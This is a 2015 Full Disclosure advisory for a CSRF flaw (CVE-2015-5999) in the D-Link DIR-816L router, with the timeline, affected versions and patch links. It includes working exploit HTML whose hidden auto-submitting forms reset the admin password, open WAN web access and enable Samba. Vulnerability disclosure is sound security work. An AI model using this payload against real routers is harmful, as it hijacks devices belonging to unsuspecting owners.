[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF) vulnerability
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF) vulnerability
- From: Bhadresh Patel <Bhadresh.Patel@xxxxxxxxxx>
- Date: Tue, 10 Nov 2015 15:21:02 +0000
Title:
====
D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF)
vulnerability
Credit:
======
Name: Bhadresh Patel
Company/affiliation: HelpAG
Website: www.helpag.com
CVE:
=====
CVE-2015-5999
Date:
====
10-11-2015 (dd/mm/yyyy)
Vendor:
======
D-Link is a computer networking company with relatively modest beginnings in
Taiwan. The company has grown over the last 25 years into an exciting global
brand offering the most up-to-date network solutions. Whether it is to suit the
needs of the home consumer, a business or service provider, D-link take pride
in offering award-winning networking products and services.
Product:
=======
DIR-816L is a wireless AC750 Dual Band Cloud Router
Product link: http://support.dlink.com/ProductInfo.aspx?m=DIR-816L
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-816L wireless router
enables an attacker to perform an unwanted action on a wireless router for
which the user/admin is currently authenticated.
Report-Timeline:
============
27-07-2015: Vendor notification
27-07-2015: Vendor Response/Feedback
05-11-2015: Vendor Fix/Patch
10-11-2015: Public or Non-Public Disclosure
Affected Version:
=============
<=2.06.B01
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-816L authenticated user to browse a malicious
website can exploit cross site request forgery (CSRF) to submit commands to
DIR-816L wireless router and gain control of the product. The attacker could
submit variety of commands including but not limited to changing the admin
account password, changing the network policy, etc.
Proof Of Concept:
================
1) User login to DIR-816L wireless router
2) User visits the attacker's malicious web page (attacker.html)
3) attacker.html exploits CSRF vulnerability and changes the admin account
password
PoC video link: http://youtu.be/UBdR2sUc8Wg
Exploit code (attacker.html):
<html>
<body>
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi"; method="POST" enctype="text/plain"
target="hiddenpost" id="csrf">
<input type="hidden" name="<?xml version"
value=""1.0" encoding="UTF-8"?> <postxml> <module> 	<service>DEVICE.ACCOUNT</service> 	<device> 		<gw_name>DIR-816L</gw_name> 		 		<account> 			<seqno>1</seqno> 			<max>2</max> 			<count>1</count> 			<entry> 				<uid>USR-</uid> 				<name>Admin</name> 				<usrid/> 				<password>password</password> 				<group>0</group> 				<description/> 			</entry> 		</account> 		<group> 			<seqno/> 			<max/> 			<count>0</count> 		</group> 		<session> 			<captcha>1</captcha> 			<dummy/> 			<timeout>180</timeout> 			<maxsession>128</maxsession> 			<maxauthorized>16</maxauthorized> 		</session> 	</device> </module> <module> 	<service>HTTP.WAN-1</service> 	<inf> 		<web></web> 		<https_rport></https_rport> 		<stunnel>1</stunnel> 		<weballow> 			<hostv4ip/> 		</weballow> 		<inbfilter/> 	</inf> 	 </module> <module> 	<service>HTTP.WAN-2</service> 	<inf> 		<active>0</active> 		<nat>NAT-1</nat> 		<web/> 		<weballow> 			<hostv4ip/> 		</weballow> 	</inf> 	 </module> <module> 	<service>INBFILTER</service> 	<acl> 		<inbfilter>		 						<seqno>1</seqno> 			<max>24</max> 			<count>0</count> 		</inbfilter>		 	</acl> 	<ACTIVATE>ignore</ACTIVATE> <FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module> <module> 	<service>SHAREPORT</service> 	<FATLADY>ignore</FATLADY> 	 <ACTIVATE>ignore</ACTIVATE></module> <module> 	<service>SAMBA</service> 	<samba>		 		     		<enable>1</enable> 		<auth>1</auth>     </samba> </module> </postxml>"
/>
</form>
<script>alert("This is CSRF
PoC");document.getElementById("csrf").submit()</script>
<iframe style="display:none" name="hiddencommit"></iframe>
<form action="http://192.168.0.1/pigwidgeon.cgi"; method="POST"
target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
</body>
</html>
Patched/Fixed Firmware and notes:
==========================
2.06.B09_BETA --
ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP<ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP>
2.06.B09_BETA --
ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF<ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF>
Credits:
=======
Bhadresh Patel
Security Analyst
HelpAG (www.helpag.com)
Bhadresh Patel
Senior Security Analyst
T: +97144405666 [cid:image75f390.JPG@16e77421.4494c42b] F: +971 4 363 6742
[cid:image75f390.JPG@16e77421.4494c42b] M: +971529172297
[cid:image04a77b.PNG@ce6d1601.4ab164a8]
[cid:image677e4d.JPG@0f357520.4fba0f9b]<www.helpag.com>
[cid:image957c6e.PNG@d3afefe7.4abca211]
[cid:imagebe08c8.JPG@9262bf6a.4aa7f0b4] [cid:image4fc04d.BMP@e6f0ab92.4ab38950]
<https://www.facebook.com/pages/help-AG-Middle-East/185411873637>
[cid:image97dfe3.BMP@4ff68c60.44a3be00]
<http://www.linkedin.com/company/help-ag>
[cid:image1d495d.JPG@496727d5.409f0d23] <http://www.youtube.com/user/helpag>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/